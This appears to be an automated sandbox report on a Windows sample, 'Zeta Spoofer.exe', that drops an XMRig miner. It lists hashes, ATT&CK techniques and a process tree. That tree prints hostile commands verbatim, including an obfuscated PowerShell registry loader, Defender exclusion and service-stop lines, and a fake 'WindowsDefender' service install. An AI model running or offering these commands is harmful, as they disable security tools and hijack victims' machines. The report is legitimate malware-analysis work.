xmrig | 57b791d2c6eb50e566e19335af4f848a84fb0695d41afef156abccd753ba94a9

Resubmissions

27-01-2025 20:41

250127-zghmnsvqbr 10

27-01-2025 20:36

250127-zdqh4svkct 10

Analysis

max time kernel
150s
max time network
144s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
27-01-2025 20:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Zeta Spoofer.exe
Size

16.6MB
MD5

58c13144b662425b9373d0687fd6c291
SHA1

0664e627b6539d3ad79cb43d8e3131d5f3bb5b6a
SHA256

57b791d2c6eb50e566e19335af4f848a84fb0695d41afef156abccd753ba94a9
SHA512

c2534c081a34c2f825c59a926c95cdf00c1b23da2290581380c6ad1aa25523cba8e2346c0e54c2b56a7725eda862a2531828ed80edc93e37db9044c41039c960
SSDEEP

393216:5SDLxiW3R0mP1RmUh/ObTeJQlIvfcciFRM3P2lWVPNL+9m+O/:5oLRR0u1RmEOu0Ivfb3NNLz+

Score

10^/10

xmrig defense_evasion discovery execution miner persistence pyinstaller upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2980 created 432	2980	powershell.EXE	5

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral1/memory/2996-2008-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2996-2010-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2996-2011-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2996-2014-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2996-2013-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2996-2012-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2996-2007-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2980	powershell.EXE
3064	powershell.exe
2488	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	ZetaSpoofer.exe
File created	C:\Windows\system32\drivers\etc\hosts	Defenderupdates.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 5 IoCs

pid	Process
2316	Zeta.exe
1704	ZetaSpoofer.exe
1888	Zeta.exe
480	services.exe
2388	Defenderupdates.exe

Loads dropped DLL 5 IoCs

pid	Process
2532	Zeta Spoofer.exe
2532	Zeta Spoofer.exe
2316	Zeta.exe
1888	Zeta.exe
480	services.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	pastebin.com
5	pastebin.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2404	powercfg.exe
1204	powercfg.exe
2172	powercfg.exe
2104	powercfg.exe
2308	powercfg.exe
2516	powercfg.exe
1316	powercfg.exe
2468	powercfg.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\MRT.exe	Defenderupdates.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	ZetaSpoofer.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1704 set thread context of 2040	1704	ZetaSpoofer.exe	44
PID 2388 set thread context of 1244	2388	Defenderupdates.exe	67
PID 2388 set thread context of 2544	2388	Defenderupdates.exe	68
PID 2388 set thread context of 2996	2388	Defenderupdates.exe	72
PID 2980 set thread context of 2364	2980	powershell.EXE	75

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2996-2002-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2996-2004-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2996-2008-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2996-2010-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2996-2011-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2996-2014-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2996-2013-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2996-2012-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2996-2007-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2996-2006-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2996-2005-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2996-2003-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2920	sc.exe
1652	sc.exe
1740	sc.exe
2936	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x00080000000120fd-6.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Zeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Zeta.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0110940fb70db01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	dialer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1704	ZetaSpoofer.exe
3064	powershell.exe
1704	ZetaSpoofer.exe
1704	ZetaSpoofer.exe
1704	ZetaSpoofer.exe
1704	ZetaSpoofer.exe
1704	ZetaSpoofer.exe
1704	ZetaSpoofer.exe
1704	ZetaSpoofer.exe
1704	ZetaSpoofer.exe
1704	ZetaSpoofer.exe
1704	ZetaSpoofer.exe
2388	Defenderupdates.exe
2488	powershell.exe
2980	powershell.EXE
2388	Defenderupdates.exe
2388	Defenderupdates.exe
2388	Defenderupdates.exe
2388	Defenderupdates.exe
2388	Defenderupdates.exe
2388	Defenderupdates.exe
2388	Defenderupdates.exe
2388	Defenderupdates.exe
2980	powershell.EXE
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe
2364	dllhost.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeShutdownPrivilege	2104	powercfg.exe
Token: SeShutdownPrivilege	1316	powercfg.exe
Token: SeShutdownPrivilege	2308	powercfg.exe
Token: SeShutdownPrivilege	2516	powercfg.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	2980	powershell.EXE
Token: SeShutdownPrivilege	2404	powercfg.exe
Token: SeShutdownPrivilege	2468	powercfg.exe
Token: SeShutdownPrivilege	2172	powercfg.exe
Token: SeShutdownPrivilege	1204	powercfg.exe
Token: SeLockMemoryPrivilege	2996	dialer.exe
Token: SeDebugPrivilege	2980	powershell.EXE
Token: SeDebugPrivilege	2364	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2532 wrote to memory of 2316	2532	Zeta Spoofer.exe	29
PID 2532 wrote to memory of 2316	2532	Zeta Spoofer.exe	29
PID 2532 wrote to memory of 2316	2532	Zeta Spoofer.exe	29
PID 2532 wrote to memory of 2316	2532	Zeta Spoofer.exe	29
PID 2532 wrote to memory of 1704	2532	Zeta Spoofer.exe	30
PID 2532 wrote to memory of 1704	2532	Zeta Spoofer.exe	30
PID 2532 wrote to memory of 1704	2532	Zeta Spoofer.exe	30
PID 2316 wrote to memory of 1888	2316	Zeta.exe	31
PID 2316 wrote to memory of 1888	2316	Zeta.exe	31
PID 2316 wrote to memory of 1888	2316	Zeta.exe	31
PID 2316 wrote to memory of 1888	2316	Zeta.exe	31
PID 1704 wrote to memory of 2040	1704	ZetaSpoofer.exe	44
PID 1704 wrote to memory of 2040	1704	ZetaSpoofer.exe	44
PID 1704 wrote to memory of 2040	1704	ZetaSpoofer.exe	44
PID 1704 wrote to memory of 2040	1704	ZetaSpoofer.exe	44
PID 1704 wrote to memory of 2040	1704	ZetaSpoofer.exe	44
PID 1704 wrote to memory of 2040	1704	ZetaSpoofer.exe	44
PID 2352 wrote to memory of 3032	2352	cmd.exe	47
PID 2352 wrote to memory of 3032	2352	cmd.exe	47
PID 2352 wrote to memory of 3032	2352	cmd.exe	47
PID 1684 wrote to memory of 2980	1684	taskeng.exe	58
PID 1684 wrote to memory of 2980	1684	taskeng.exe	58
PID 1684 wrote to memory of 2980	1684	taskeng.exe	58
PID 2388 wrote to memory of 1244	2388	Defenderupdates.exe	67
PID 2388 wrote to memory of 1244	2388	Defenderupdates.exe	67
PID 2388 wrote to memory of 1244	2388	Defenderupdates.exe	67
PID 2388 wrote to memory of 1244	2388	Defenderupdates.exe	67
PID 2388 wrote to memory of 1244	2388	Defenderupdates.exe	67
PID 2388 wrote to memory of 1244	2388	Defenderupdates.exe	67
PID 2388 wrote to memory of 2544	2388	Defenderupdates.exe	68
PID 2388 wrote to memory of 2544	2388	Defenderupdates.exe	68
PID 2388 wrote to memory of 2544	2388	Defenderupdates.exe	68
PID 2388 wrote to memory of 2544	2388	Defenderupdates.exe	68
PID 2388 wrote to memory of 2544	2388	Defenderupdates.exe	68
PID 2388 wrote to memory of 2544	2388	Defenderupdates.exe	68
PID 2388 wrote to memory of 2544	2388	Defenderupdates.exe	68
PID 2388 wrote to memory of 2544	2388	Defenderupdates.exe	68
PID 2388 wrote to memory of 2544	2388	Defenderupdates.exe	68
PID 2388 wrote to memory of 2996	2388	Defenderupdates.exe	72
PID 2388 wrote to memory of 2996	2388	Defenderupdates.exe	72
PID 2388 wrote to memory of 2996	2388	Defenderupdates.exe	72
PID 2152 wrote to memory of 1616	2152	cmd.exe	73
PID 2152 wrote to memory of 1616	2152	cmd.exe	73
PID 2152 wrote to memory of 1616	2152	cmd.exe	73
PID 2388 wrote to memory of 2996	2388	Defenderupdates.exe	72
PID 2388 wrote to memory of 2996	2388	Defenderupdates.exe	72
PID 2980 wrote to memory of 2364	2980	powershell.EXE	75
PID 2980 wrote to memory of 2364	2980	powershell.EXE	75
PID 2980 wrote to memory of 2364	2980	powershell.EXE	75
PID 2980 wrote to memory of 2364	2980	powershell.EXE	75
PID 2980 wrote to memory of 2364	2980	powershell.EXE	75
PID 2980 wrote to memory of 2364	2980	powershell.EXE	75
PID 2980 wrote to memory of 2364	2980	powershell.EXE	75
PID 2980 wrote to memory of 2364	2980	powershell.EXE	75
PID 2980 wrote to memory of 2364	2980	powershell.EXE	75
PID 2364 wrote to memory of 432	2364	dllhost.exe	5
PID 2364 wrote to memory of 480	2364	dllhost.exe	6
PID 2364 wrote to memory of 488	2364	dllhost.exe	7
PID 2364 wrote to memory of 496	2364	dllhost.exe	8
PID 2364 wrote to memory of 588	2364	dllhost.exe	9
PID 2364 wrote to memory of 668	2364	dllhost.exe	10
PID 2364 wrote to memory of 748	2364	dllhost.exe	11
PID 2364 wrote to memory of 804	2364	dllhost.exe	12
PID 2364 wrote to memory of 832	2364	dllhost.exe	13

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ee3eef98-d4e5-4804-b653-8b2295cdd926}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2364

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:480
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:588
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1608
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:1728
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    PID:1768
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:668
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  PID:748
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:804
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1360
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  PID:832
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {FC2518EF-CEFB-472F-B38A-6EDAF9029BBD} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+'a'+'l'+'er'+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2980
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:944
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:1008
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:736
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:984
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1296
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1720
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:1348
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:1976
- C:\ProgramData\Defenderupdates.exe
  C:\ProgramData\Defenderupdates.exe
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2152
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:1616
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2468
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2172
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2404
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1204
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:1244
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2544
- - C:\Windows\system32\dialer.exe
    dialer.exe
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:2996

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:488

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:496

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1396
- C:\Users\Admin\AppData\Local\Temp\Zeta Spoofer.exe
  "C:\Users\Admin\AppData\Local\Temp\Zeta Spoofer.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2532
- - C:\Users\Admin\AppData\Local\Temp\Zeta.exe
    "C:\Users\Admin\AppData\Local\Temp\Zeta.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2316
  - - C:\Users\Admin\AppData\Local\Temp\Zeta.exe
      "C:\Users\Admin\AppData\Local\Temp\Zeta.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1888
- - C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1704
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2352
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:3032
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2104
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2308
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1316
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2516
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      PID:2040
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WindowsDefender"
      4⤵
      Launches sc.exe
      PID:1652
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WindowsDefender" binpath= "C:\ProgramData\Defenderupdates.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:1740
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2920
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WindowsDefender"
      4⤵
      Launches sc.exe
      PID:2936

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-919612886-113640727-552900401-759548675991583391794867174-711317177-2065773916"
1⤵
PID:2568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Zeta.exe

Filesize
11.3MB

MD5
f79df4f96e90110491b16131ad54f231

SHA1
307be8cf98adb6c2f359ffa67c8e9476febadd5a

SHA256
817967415a85915d7d4b1ac89b3f0d0ae8c1fce55cb90d20c0893e191754ea1a

SHA512
ffa198a828b57344280065036eea34e928672bbdaba6fedbf3137cd69246a265bd0fbb7803e6806e474d2c96de4dc9a9cfa0f35b617b045673759afd976ee0c9

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1013B

MD5
27cfde53cb5a0cc9608f754760735896

SHA1
1610941c4bfff2f330eb8ae96006d8e216fc5ece

SHA256
12df6caaf3658022c70ef87f4b39ffeaf4abb6d269cd2ba12c4d354c459c7e2f

SHA512
535afd5d12005a856a44f7f7cd2a623b1c483ea4e9d63d06c610407aa45a721854c3975d4b2b4af6949d81c09151d809d521f2fe9253bf402d15869e83a6c289

Download Submit
\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe

Filesize
5.3MB

MD5
7bda2ed86f648c8528531d76f0a53f2a

SHA1
5c852efdb51b00cbfa0dc0ca0d017a3f52dae069

SHA256
667849a179671c441d44de621592f75bb3a2233f3c70370122fba047720e61e2

SHA512
075d1475b87ca7b2e1096077ffa58a7dd880c2f7f9a67b5283ed14223b9fd941f9136caff782a6ca8fc0831aaccb509fe44968447d2f1dd665bbd4cd9acda356

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI23162\python39.dll

Filesize
4.2MB

MD5
2a9c5db70c6906571f2ca3a07521baa2

SHA1
765fa27bbee6a02b20b14b2b78c92a880e6627e5

SHA256
c69ce89b0487d86a63b64951207781f8051282afde67b20d3b8374c1a067f611

SHA512
fa4a677eaae2d258ac4f083a4e7009d985523b964ada93f53dc399a88c14970c7be2d2f39a7b38a922b58d134df2ede954554dcd00a4895e4273161867acac53

Download Submit
memory/432-2031-0x0000000000C20000-0x0000000000C45000-memory.dmp

Filesize
148KB

Download
memory/432-2045-0x00000000379E0000-0x00000000379F0000-memory.dmp

Filesize
64KB

Download
memory/432-2044-0x000007FEBF690000-0x000007FEBF6A0000-memory.dmp

Filesize
64KB

Download
memory/432-2043-0x0000000000C50000-0x0000000000C7B000-memory.dmp

Filesize
172KB

Download
memory/432-2029-0x0000000000C20000-0x0000000000C45000-memory.dmp

Filesize
148KB

Download
memory/432-2032-0x0000000000C50000-0x0000000000C7B000-memory.dmp

Filesize
172KB

Download
memory/432-2035-0x0000000000C50000-0x0000000000C7B000-memory.dmp

Filesize
172KB

Download
memory/2040-1976-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2040-1972-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2040-1973-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2040-1974-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2040-1971-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2364-2026-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2364-2018-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2364-2019-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2364-2020-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2364-2021-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2364-2023-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2364-2024-0x00000000779A0000-0x0000000077B49000-memory.dmp

Filesize
1.7MB

Download
memory/2364-2025-0x0000000077780000-0x000000007789F000-memory.dmp

Filesize
1.1MB

Download
memory/2488-1982-0x0000000019D70000-0x000000001A052000-memory.dmp

Filesize
2.9MB

Download
memory/2488-1983-0x0000000000A50000-0x0000000000A58000-memory.dmp

Filesize
32KB

Download
memory/2532-3-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2532-428-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2532-0-0x000007FEF57FE000-0x000007FEF57FF000-memory.dmp

Filesize
4KB

Download
memory/2544-1998-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2544-2000-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2544-1995-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2544-1994-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2544-1993-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2544-1992-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2980-2015-0x0000000000B50000-0x0000000000B7A000-memory.dmp

Filesize
168KB

Download
memory/2980-2016-0x00000000779A0000-0x0000000077B49000-memory.dmp

Filesize
1.7MB

Download
